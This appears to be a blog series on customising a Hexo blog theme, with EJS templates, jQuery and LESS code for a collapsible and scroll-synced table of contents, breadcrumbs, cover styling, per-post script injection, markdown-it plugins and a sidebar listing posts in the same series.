Grab the hljs element and toggle a closed class on it; the remaining logic is left to the CSS.

Posts get a new highlight_shrink parameter; if it is true, code blocks start out collapsed.

    function setHighlightHeightLimit()
function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
{
// limit the maximum height of the code block
if (HighlightHeightLimit != "")
{
var hljs = codeBlock.querySelector('.hljs');
hljs.style.maxHeight = HighlightHeightLimit;
}
}

Caps a code block's maximum height; the value comes from page.highlight_height_limit.

    highlight_tools.css

    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

Right sidebar and TOC

This theme comes with toc support, using Hexo's built-in toc helper, but no layout was ever written for it... so it sat unused.

@@ -595,7 +593,7 @@

I decided to redesign the TOC structure: place it on the right of the article and have it follow the scroll in real time.

The hexo-toc plugin conflicts with the built-in toc, so uninstall it.

npm uninstall hexo-toc

Methodology

Based on the default toc helper: 辅助函数(Helpers)| Hexo

A single <%- toc(page.content,{list_number:false}) %> statement spits out the entire TOC:

    @@ -611,49 +609,49 @@

    rightside.ejs

15. hidden hides the TOC and its button; this exists because of the encryption plugin.
16. toc.js controls the logic of TOC generation.
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

    goto_position.js

The original goTop.js is modified so it can also scroll to the bottom:

(function ($) {
jQuery.fn.gotoPosition = function (opt) {
var ele = this;
var win = $(window);
var doc = $("html,body");
var defaultOpt = {
speed: 500,
iconSpeed: 200,
animationShow: {
opacity: "1",
},
animationHide: {
opacity: "0",
},
};
var options = $.extend(defaultOpt, opt);

ele.click(function () {
var targetOffset = 0;
if (opt && opt.target) {
if (opt.target === "top") {
targetOffset = 0; // jump to the top of the document
} else if (opt.target === "bottom") {
targetOffset = $(document).height() - win.height(); // jump to the bottom of the document
}
}
doc.animate(
{
scrollTop: targetOffset, // scroll the document to the target position
},
options.speed
);
});
};
})(jQuery);

    toc.js

    function initToc()

Initializes the TOC. If the post is not encrypted (i.e. no element with the classes hbe and hbe-content exists), the hidden class is removed from the TOC.

Following Butterfly, localStorage is used to decide whether the TOC is shown by default.

function initToc() {
  // Check whether an element with the classes 'hbe' and 'hbe-content' exists
  if ($('.hbe.hbe-content').length > 0) {
    // The post is still encrypted: hide '.rightside-button' and '.post-toc'
    $('.rightside-button, .post-toc').addClass('hidden');
    return;
  } else {
    // Remove the 'hidden' class from '.rightside-button' and '.post-toc'
    $('.rightside-button').removeClass('hidden');
    $('.post-toc').removeClass('hidden');
  }

  var value = localStorage.getItem('aside-status');
  if (value === null) { // if the item does not exist yet, create it
    localStorage.setItem('aside-status', "true");
    value = "true"; // keep it a string so the comparison below also matches on the first visit
  }
  if (value === "true") {
    $("#post-toc").addClass("show-toc");
    $("#content").addClass("show-toc");
  }
  createToc();
}
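One detail the string fix above relies on: localStorage stores strings only, so any boolean written with setItem comes back as "true"/"false". A quick console sketch (my own illustration, not part of the theme code):

// localStorage coerces every value to a string
localStorage.setItem('aside-status', true);
console.log(typeof localStorage.getItem('aside-status')); // "string"
console.log(localStorage.getItem('aside-status') === "true"); // true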
    createToc()

Creates the TOC:

• Elements are appended one by one into nested <ol class="toc-child"> lists.
• Clicking a TOC entry smoothly scrolls to the corresponding position.
function createToc() {
  var toc = $('.toc');
  toc.empty();

  var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
  var currentLevel = 1;
  var currentList = toc;

  for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
    // An ID must not start with a digit; if it does, prefix an underscore
    if (/^[0-9]/.test(heading.attr('id'))) {
      heading.attr('id', '_' + heading.attr('id'));
    }
    if (!heading.find('a').length) // no <a> inside the heading: probably user-created, skip it
      continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
    // Build the nested list structure
    if (level > currentLevel) {
      for (var j = currentLevel + 1; j <= level; j++) {
        var newOl = $('<ol>').addClass('toc-child');
        var newLi = $('<li>').addClass('toc-item toc-level-level1-' + j);
        currentList.append(newLi);
        newLi.append(newOl);
        currentList = newOl;
      }
    } else if (level < currentLevel) {
      for (var j = level; j < currentLevel; j++) {
        currentList = currentList.parent().parent();
      }
    }
    var li = $('<li>').addClass('toc-item toc-level-level-' + level);
    // Extract hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
    // The ID must not start with a digit; if it does, insert an underscore after the '#'
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
      hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
    // Extract titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
    // Create the <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
    // Override the jump behaviour when a TOC entry is clicked
    a.on("click", function (event) {
      event.preventDefault();
      var element = $($(this).attr("href"));
      var rect = element[0].getBoundingClientRect();
      var topOffset = rect.top + window.scrollY - 90; // -90 accounts for the fixed top bar
      window.scrollTo({
        top: topOffset,
        behavior: "smooth"
      });
    });
    currentList.append(li);
    currentLevel = level;
  }
}
$("#js-toc").click()

Clicking the button toggles whether the TOC is displayed.

$("#js-toc").click(function () {
  var postToc = $("#post-toc");
  var content = $("#content");
  if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', "true"); // stored as a string either way
    content.addClass("show-toc");
    postToc.addClass("show-toc");
  } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', "false");
  }
});

This controls whether the TOC is displayed: hand the element a show-toc class and let the LESS do the rest.

    function getTopHeadingId()

Gets the id of the heading currently closest to the top of the viewport, adapted from code I copied; the offset (90 in the code) accounts for the theme's fixed top bar:

function getTopHeadingId() {
  const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
  let topHeadingId = null;
  let minDistanceFromTop = Infinity;
  for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
      minDistanceFromTop = distanceFromTop;
      topHeadingId = heading.id;
    }
  }
  return topHeadingId;
}
    document.addEventListener()

The TOC highlights the heading for the current scroll position: hand the link an active class and let the LESS do the rest.

When the active entry falls outside the TOC's visible area, the TOC itself is scrolled so the entry becomes visible again.

document.addEventListener("scroll", function (event) {
  const tocLinks = document.querySelectorAll('a.toc-link');
  const topHeadingId = getTopHeadingId();
  tocLinks.forEach(link => {
    var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');
    if (href == topHeadingId) {
      if (!link.classList.contains('active')) {
        link.classList.add("active");
        var toc = document.querySelector(".toc");
        var activeItem = toc.querySelector(".active");
        if (activeItem) {
          toc.scrollTo({
            top: activeItem.offsetTop - 100
          });
        }
      }
    } else {
      link.classList.remove("active");
    }
  });
}, { passive: true }); // addEventListener takes an options object here, not a number
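The listener above fires on every scroll event (the numeric third argument in the original had no throttling effect). If that ever becomes a bottleneck, a small throttle wrapper is one option; a minimal sketch, where the wrapper name and the 200 ms interval are my own choices rather than part of the theme:

// Minimal throttle: run fn at most once per `wait` milliseconds
function throttle(fn, wait) {
  var last = 0;
  return function () {
    var now = Date.now();
    if (now - last >= wait) {
      last = now;
      fn.apply(this, arguments);
    }
  };
}

// Hypothetical usage: wrap the highlight logic from above
document.addEventListener("scroll", throttle(function () {
  // ...same active-link highlighting as in the listener above...
}, 200), { passive: true });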

    toc.less

Still following Butterfly's layout: when the TOC is shown, the main content shifts left, and a mobile adaptation is included as well.

.post-toc {
  border-radius: 10px;
  background: rgba(255, 255, 255, 0.9);
  box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
  padding: 10px 5px 10px 5px;
  border: 1px solid rgba(18, 24, 58, 0.06);

  .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
  }

  .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
  }

  .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
  }

  .toc::-webkit-scrollbar-thumb {
    background-color: #AAA; /* scrollbar thumb colour */
    border-radius: 10px;
  }

  a {
    text-decoration: none;
  }

  ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
      .toc-text {
        color: #FFF;
      }
    }

    .toc-link {
      margin-right: 5px;
      padding-top: 5px;
      padding-bottom: 5px;
      display: block;
    }

    li {
      margin-left: 10px;
      background: none;

      .toc-text {
        padding: 0 5px;
        color: #898fa0;
      }

      .active {
        span {
          padding: 4px 10px;
          border-radius: 8px;
          background: rgba(0, 106, 255, 0.8);
        }
      }
    }

    span:hover {
      color: #4183c4;
    }
  }
}

@media screen and (min-width: 1100px) {
  .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
  }

  .toc {
    max-height: 40vh;
  }

  .post-toc.show-toc {
    right: min(30px, 2vw);
  }

  .post-toc.show-toc.hidden {
    right: -250px;
  }

  .post-content.show-toc {
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
  }
}

@media screen and (max-width: 1100px) {
  .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
  }

  .toc {
    max-height: 16vh;
  }

  .post-toc.show-toc {
    bottom: 20px;
  }

  .post-toc.show-toc.hidden {
    right: -30vh;
  }
}

    dispatch_event.js

Newer versions of hexo-blog-encrypt provide a callback after decryption; update the plugin:

npm update hexo-blog-encrypt

    After Decrypt Event

Thanks to @f-dong, an event named hexo-blog-decrypt is now triggered after decryption, so you can add a callback listening for that event.

// trigger event
var event = new Event('hexo-blog-decrypt');
window.dispatchEvent(event);

Re-initialize the TOC after decryption:

// trigger event
var event = new Event('hexo-blog-decrypt');
window.dispatchEvent(event);

// define the callback
function handleHexoBlogDecryptEvent() {
  console.log("文章解密成功!"); // "post decrypted successfully"
  initToc();
}

// register the event listener
window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);

Demo

Desktop:

[screenshot]


Code

home.ejs

Modify home.ejs and add a post.cover_style variable so the post's YAML front matter can control the cover image's style:

<div class="img-container">
  <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
</div>

    home.less

The corresponding LESS:

.img-container {
  width: 100%;
  height: 200px;
  background: @headerBackgroundColor;
  position: relative;

  img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
  }
}

Making an out-of-frame cover

Touch up an out-of-frame cover in Photoshop. It's decided, it's you, 癫狂公爵西塔尔! Even a madman should have manners.

My covers are normally 800px × 450px; this one is set to 800px × 738px. In Photoshop, keep the "frame" 450px tall, with the top of the "frame" 150px below the top of the canvas.

[screenshot]

    cover_style

Set a custom cover_style in the post front matter:

cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

This overrides the previous cover style:

• height: 164%; comes from 738 / 450 ≈ 1.64.
• transform: translateY(-20.3%); comes from 150 / 738 ≈ 0.203 (the 150px frame offset over the 738px image height).

Pinned icon

For posts with a top attribute, add a pinned icon.

Code

      home.ejs

<% if(post.top){ %>
  <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
<% } %>

      home.less

Correspondingly:

.stiky {
  width: 18px;
  height: 18px;
  margin: 8px 6px 0 0;
}

Demo

[screenshot]

Lock icon

Code

home.ejs

Whether post.password has a value determines whether the post is treated as encrypted.

<img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

Demo

[screenshot]

Breadcrumb navigation

      header.ejs

Add a <ul> to hold the breadcrumb.

<div class="h-left">
  <a href="<%= theme.menus_link.home %>" class="logo">
    <img src="<%- theme.logo %>" alt="Quiet">
  </a>
  <ul class="breadcrumb" id="breadcrumb"></ul>
</div>

Call the JS at the bottom and pass it parameters (getting values from YAML into JS is fairly involved and takes some thought):

<%- js('js/breadcrumb.js') %>
<script>
  var menus_title = [];
  <% Object.keys(theme.menus_title).forEach(function(menu) { %>
    menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
  <% }); %>
  <% if(page.categories){ %>
    <% page.categories.data.map((cat)=>{ %>
      categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
    <% }) %>
  <% } else { %>
    customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
  <% } %>
</script>
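After rendering, menus_title is an array of one-key objects. A sketch of the resulting shape and of how customBreadcrumb later looks a title up (the keys and titles here are made-up placeholders, not the theme's actual config):

// Hypothetical rendered result of the EJS loop above
var menus_title = [
  { posts: '文章' },
  { archives: '归档' }
];

// Lookup, as customBreadcrumb does below
var levelName = 'posts';
var title_obj = menus_title.find(function (item) {
  return item[levelName] !== undefined;
});
console.log(title_obj ? title_obj[levelName] : null); // '文章'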

Two kinds of breadcrumb are designed:

• customBreadcrumb: for pages without a category, builds the breadcrumb from the URL path and the menus_title mapping.
• categoriesBreadcrumb: for regular posts, builds the breadcrumb from the post's category.

      function customBreadcrumb()

function customBreadcrumb(breadcrumb, menus_title) {
  // current page path
  var path = window.location.pathname;
  var levels = path.split('/');
  levels.shift(); // drop the leading empty string
  levels.pop();   // drop the trailing empty string

  // first pass: make sure the top level can be resolved
  for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);

    if (i === 0) {
      // find the key in menus_title matching levelName and take its value
      var title_obj = menus_title.find(function (item) {
        return item[levelName] !== undefined;
      });
      var title_value = title_obj ? title_obj[levelName] : null;
      if (!title_value) {
        return; // no matching title: bail out without building anything
      }
    }
  }

  // reaching here means everything resolved; build the breadcrumb items
  for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);
    var li = document.createElement('li');
    var a = document.createElement('a');
    if (i === 0) {
      a.textContent = title_value;
    } else {
      a.textContent = levelName;
    }
    if (i == levels.length - 1) {
      a.classList.add("last");
    }
    a.href = levelLink;
    li.appendChild(a);
    breadcrumb.appendChild(li);
  }
}

      function categoriesBreadcrumb()

function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
  var li = document.createElement('li');
  var a = document.createElement('a');

  a.textContent = categories;
  a.href = categoriesLink;
  li.appendChild(a);
  breadcrumb.appendChild(li);

  li = document.createElement('li');
  a = document.createElement('a');

  a.textContent = "文章"; // fixed label meaning "post"
  a.href = window.location.href;
  a.classList.add("last");

  li.appendChild(a);
  breadcrumb.appendChild(li);
}
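A quick way to see what this produces, as a sketch (the category name and link are placeholders, and the second href serializes as the current page URL):

// Hypothetical usage of categoriesBreadcrumb
var ul = document.createElement('ul');
categoriesBreadcrumb(ul, "学习", "/categories/学习");
console.log(ul.innerHTML);
// <li><a href="/categories/学习">学习</a></li><li><a href="..." class="last">文章</a></li>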

      header.less

Set the styles in the corresponding place in header.less:

.breadcrumb {
  margin-left: 5px;
  display: flex;
  list-style: none;
  padding: 0;

  a {
    color: #898fa0;
    text-decoration: none;
  }

  .last {
    color: #12183A;
  }

  .dot {
    display: inline-block;
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: #006AFF;
    position: relative;
    top: -12px;
    left: 2px;
  }
}

.breadcrumb li::before {
  color: #898fa0;
  content: ">";
  margin: 0 5px;
}

Tweak the mobile adaptation a little:

@media screen and (max-width:660px) {
  .header {
    .header-top {
      .h-left {
        flex-grow: 3;
      }
      ...

Result

customBreadcrumb

[screenshot]


This seems to be a universal problem; every theme has it.

Add a flag to the front matter of posts that use APlayer:

APlayer: true

Grab APlayer.min.css and APlayer.min.js from APlayer (a minimalist, good-looking HTML5 music player supporting multiple modes, including playlist and fixed modes; gitee.com) and put them in the corresponding directories.

Modify header.ejs:

<% if(page.APlayer) { %>
  <%- css('css/third-party/APlayer.min.css') %>
  <%- js('js/third-party/APlayer.min.js') %>
<% } %>

Set the option in source/_config.yml to avoid loading the assets twice (see hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer on github.com):

aplayer:
  asset_inject: false

Done. I suspect the hexo-tag-map plugin works the same way, but I don't much like that one and haven't used it in ages, so I'll skip configuring it.

Giscus comments

Switch the comment system to giscus.

      tabs

Usage:

{% tabs Unique name, [index] %}
<!-- tab [Tab caption] [@icon] -->
Any content (support inline tags too).
<!-- endtab -->
{% endtabs %}

Unique name : unique name of the tabs block tag, without commas.
  Used as a prefix (with each tab's index number) for the tab #id's.
  If the name contains whitespace, it is replaced by dashes when generating the #id.
  It only needs to be unique within the current post/page URL.
[index] : index number of the active tab.
  If not specified, the first tab (1) is selected.
  If the index is -1, no tab is selected; it behaves like a spoiler.
  Optional parameter.
[Tab caption] : caption of the current tab.
  If no caption is specified, the unique name with the tab index suffix is used as the caption.
  If no caption is specified but an icon is, the caption stays empty.
  Optional parameter.
[@icon] : FontAwesome icon name (full name, e.g. 'fas fa-font').
  Can be given with or without a space; 'Tab caption @icon' is the same as 'Tab caption@icon'.
  Optional parameter.

Tab named "First Tab"

Icon only, no tab name

Name + icon

      hide

Ported from Butterfly's docs: Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

      hide

      inline

inline adds a button inside the text that hides content; text only.

(content must not contain an ASCII comma; use &sbquo; instead)

哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

門裏站着一個人? {% hideInline 閃 %}



      Block

      Toggle

If you have too much content to show, you can hide it in a collapsible box and expand it when needed.

(display must not contain an ASCII comma; use &sbquo; instead)

{% hideToggle Butterfly 安裝方法 %}
在你的博客根目錄裏

git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

如果想要安裝比較新的 dev 分支,可以

git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

{% endhideToggle %}

Overview

To add extra js/css/meta and so on, you can put it in Inject, which supports adding to head (before the </body> tag) and bottom (before the </html> tag).

Note: add the content as standard HTML.

inject:
  head:
    - <link rel="stylesheet" href="/self.css">
  bottom:
    - <script src="xxxx"></script>

This also sidesteps some cases where the encryption plugin breaks inline JS. Excellent!

Implementation

Add this to post_head.ejs:

<% if(page.inject) { %>
  <% if(page.inject.head) { %>
    <% for(let i = 0; i < page.inject.head.length; i++){ %>
      <%- page.inject.head[i] %>
    <% } %>
  <% } %>
<% } %>

Add this to footer.ejs:

<% if(page.inject) { %>
  <% if(page.inject.bottom) { %>
    <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
      <%- page.inject.bottom[i] %>
    <% } %>
  <% } %>
<% } %>

Collapsible TOC 2024/11/11

The TOC can now finally collapse like Butterfly and other themes do! If you don't want the TOC collapsed, set this in the post front matter:

toc_collapsed: false

Miscellaneous

This plugin lets Hexo render posts with the Markdown-it renderer, which provides much richer rules for converting Markdown syntax to HTML. Brilliant! Uninstall the previous renderer and install it:

npm install hexo-renderer-markdown-it

Bundled plugins

After installing this plugin, the following Markdown-it plugins are included by default:

        markdown-it-attrs
This plugin lets you add custom HTML attributes to Markdown elements such as headings, paragraphs, and code blocks. That way you can attach classes, IDs, and other HTML attributes to Markdown syntax elements. For example:

## Example {#custom-id .custom-class}

adds a custom ID and class name to that heading.


        markdown-it-deflist
This plugin supports Markdown definition-list syntax. Definition lists are typically used to present terms and their definitions. The syntax is:

term1
: definition1

term2
: definition2

markdown-it-emoji

These plugins extend markdown-it's capabilities, making it more flexible when processing Markdown and better able to support various formats and rendering needs. If you have particular requirements when using markdown-it, pick the plugins that suit your situation.

Getting other plugins

Of course, we can also fetch the plugins we want from MarkdownIt 插件 | Markdown It 插件:

npm install markdown-it-task-lists
npm install markdown-it-github-alerts
npm install markdown-it-anchor
npm install markdown-it-footnote

Enabling plugins

To enable some subset of them, turn them on in the _config.yml in the project root.

Following 基本撰写和格式语法 - GitHub 文档 and Typora Support, we bring in plugins that match GitHub's writing conventions and the syntax Typora supports:

# Markdown-it config
markdown:
  plugins:
    - markdown-it-sub           # subscript
    - markdown-it-sup           # superscript
    - markdown-it-mark          # highlight
    - markdown-it-task-lists    # task lists
    - markdown-it-github-alerts # GitHub alert boxes
    - markdown-it-anchor        # heading anchors
    - markdown-it-footnote      # footnotes

After enabling the render plugins, just design and include the CSS and JS for the corresponding HTML structures.
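To check what HTML a plugin actually produces before writing that CSS and JS, markdown-it can be run directly in Node; a minimal sketch (the plugin choice and input are just examples):

// Sanity-check a markdown-it plugin in Node
const MarkdownIt = require('markdown-it');
const mark = require('markdown-it-mark');

const md = new MarkdownIt().use(mark);
console.log(md.render('==我是高亮文本=='));
// <p><mark>我是高亮文本</mark></p>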

Example

NH~4~^+^

- [ ] 这个任务还没做
- [x] 这个任务做完了

==我是高亮文本==

Here is a simple footnote[^1].

A footnote can also have multiple lines[^2].

[^1]: My reference.
[^2]: To add line breaks within a footnote, prefix new lines with 2 spaces.
  This is a second line

> [!NOTE]
> Highlights information that users should take into account, even when skimming.

> [!TIP]
> Optional information to help a user be more successful.

> [!IMPORTANT]
> Crucial information necessary for users to succeed.

> [!WARNING]
> Critical content demanding immediate user attention due to potential risks.

> [!CAUTION]
> Negative potential consequences of an action.


Hexo 侧边栏

Preface

Layout

post_centent

The content of post_centent.ejs is as follows:

<div class="post-content">
  <article class="post-content-info">
    <%- page.content %>
    <%- partial('widget/comments'); %>
  </article>
  <% if(page.aside != false) { %>
    <%- partial('_partial/post_aside'); %>
  <% } %>
</div>

A <div class="post-content"> holds the main content.

• <article class="post-content-info">: the post body.
• <%- partial('_partial/post_aside') %>: the sidebar, rendered unless page.aside is false.


When the screen is wider than 960px, .post-content uses flex layout and places the sidebar to the right of the body:

display: flex;
margin: -100px auto 95px;
width: 100%;
justify-content: center;

When the screen is narrower than 960px, the "sidebar" goes below the body (as Butterfly does):

flex-direction: column;

          post_aside

The content of post_aside.ejs (abridged):

<div class="aside">
  <%- js('js/widget/aside.js'); %>
  <script>
    showAside();
  </script>

  <div class="aside-top">
    <div class="aside-top-about aside-card">
      ...
    </div>
  </div>

  <% if(page.series) { %>
    <div class="aside-top-series aside-card">
      ...
    </div>

  <div class="aside-bottom">
    <% if(page.toc) { %>
      ...
      <div class="aside-bottom-toc aside-card">
        ...
      </div>
    <% } %>
  </div>
</div>

Under <div class="aside"> there are:

• <div class="aside-top">, which uses relative positioning:

  position: relative;
  z-index: 2;
  margin-left: 20px;
  width: min(260px, 20vw);

• <div class="aside-bottom">, which uses sticky positioning, mainly so the TOC stays visible while the view scrolls:

  position: sticky;
  top: 80px;
  margin-left: 20px;
  width: min(260px, 20vw);

          aside-card

width: calc(100% - 20px);
border-radius: 10px;
background: var(--background-primary);
box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
padding: 10px;
border: 1px solid rgba(18, 24, 58, 0.06);
transition: background 0.3s ease-out;

Defines a sidebar card style.

Series tag

I designed a new post attribute: series! As far as I know, this feature is my own invention.

series: Hexo

The series value must also exist in tags; it serves as a post's series label, or a timeline of my exploration while learning an important technology.

<ol class="series">
  <% let serialNumber = 0; %>
  <% let seriesCount = 0; %>
  <% let find = false; %>
  <% site.posts.sort('date').forEach(function(post) { %>
    <% if (post.series === page.series) { %>
      <% seriesCount += 1; %>
      <% if (!find) {serialNumber += 1;} %>
      <% if (post.path === page.path) { %>
        <% find = true; %>
        <li class="series-item active">
          <a class="series-link active" href="/<%= post.path %>">
            &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
        </li>
      <% } else { %>
        <li class="series-item">
          <a class="series-link" href="/<%= post.path %>">
            &nbsp;&nbsp;<span class="text"><%= post.title %></span>
          </a>
        </li>
      <% } %>
    <% } %>
  <% }); %>
</ol>

At render time it finds all posts with the same series, sorts them by date, and places them in the sidebar so readers can quickly find the other related posts.
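The template logic boils down to a filter and a sort. A rough plain-JavaScript equivalent, with the post objects as stand-ins for Hexo's locals rather than real data:

// Rough JS equivalent of the EJS loop above (hypothetical data)
const posts = [
  { title: 'Post B', path: 'posts/b/', date: 2, series: 'Hexo' },
  { title: 'Post A', path: 'posts/a/', date: 1, series: 'Hexo' },
  { title: 'Other',  path: 'posts/c/', date: 3, series: 'Misc' },
];
const page = { series: 'Hexo', path: 'posts/b/' };

const items = posts
  .filter(p => p.series === page.series)   // same series only
  .sort((a, b) => a.date - b.date)         // chronological order
  .map(p => ({ title: p.title, active: p.path === page.path }));

console.log(items);
// [ { title: 'Post A', active: false }, { title: 'Post B', active: true } ]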

Custom sidebar

Posts can now customise the sidebar via JS! The idea is simply to use JS to insert <div class="aside-card"> elements under <div class="aside-top"> and <div class="aside-bottom">.

Because of rendering order, the JS has to go in the post's inject.bottom property (this feature is copied from Butterfly). (Putting the logic on the front end does slow page loading a little, but I think writing it this way keeps things from turning into a mess, and with this little code it hardly matters, right?)

inject:
  bottom:
    - <script type="text/javascript" src="test_aside.js"></script>
function createNode_1() {
  var e_0 = document.createElement("div");
  e_0.setAttribute("class", "poem aside-card");
  var e_1 = document.createElement("div");
  e_1.setAttribute("class", "top");
  var e_2 = document.createElement("h1");
  e_2.appendChild(document.createTextNode("长安古意"));
  e_1.appendChild(e_2);
  var e_3 = document.createElement("span");
  e_3.appendChild(document.createTextNode("唐·卢照邻"));
  e_1.appendChild(e_3);
  e_0.appendChild(e_1);
  var e_4 = document.createElement("p");
  e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
  var e_5 = document.createElement("br");
  e_4.appendChild(e_5);

  ...

  e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
  var e_72 = document.createElement("br");
  e_4.appendChild(e_72);
  e_0.appendChild(e_4);
  return e_0;
}

function createNode_2() {
  var e_0 = document.createElement("div");
  e_0.setAttribute("class", "poem aside-card");
  var e_1 = document.createElement("div");
  e_1.setAttribute("class", "top");
  var e_2 = document.createElement("h1");
  e_2.appendChild(document.createTextNode("春江花月夜"));
  e_1.appendChild(e_2);
  var e_3 = document.createElement("span");
  e_3.appendChild(document.createTextNode("唐·张若虚"));
  e_1.appendChild(e_3);
  e_0.appendChild(e_1);
  var e_4 = document.createElement("p");
  e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
  var e_5 = document.createElement("br");
  e_4.appendChild(e_5);

  ...

  e_4.appendChild(document.createTextNode("落月摇情满江树。"));
  var e_40 = document.createElement("br");
  e_4.appendChild(e_40);
  e_0.appendChild(e_4);
  return e_0;
}

function createNode_3() {
  var e_0 = document.createElement("div");
  e_0.setAttribute("class", "poem aside-card");
  var e_1 = document.createElement("div");
  e_1.setAttribute("class", "top");
  var e_2 = document.createElement("h1");
  e_2.appendChild(document.createTextNode("音乐"));
  e_1.appendChild(e_2);
  e_0.appendChild(e_1); // attach the "音乐" header (this appendChild is missing in the original snippet)
  var e_3 = document.createElement("div");
  const ap = new APlayer({
    container: e_3,
    audio: [{
      name: '梦之津渡',
      artist: '啃书',
      url: '/musics/梦之津渡.mp3',
      cover: '/musics/梦之津渡.jpg'
    }]
  });
  e_0.appendChild(e_3);
  return e_0;
}

$(document).ready(function() {
  document.querySelector(".aside-top").appendChild(createNode_1());
  document.querySelector(".aside-bottom").appendChild(createNode_2());
  var parentElement = document.querySelector(".aside-bottom");
  var firstChild = parentElement.firstChild;
  parentElement.insertBefore(createNode_3(), firstChild);
});

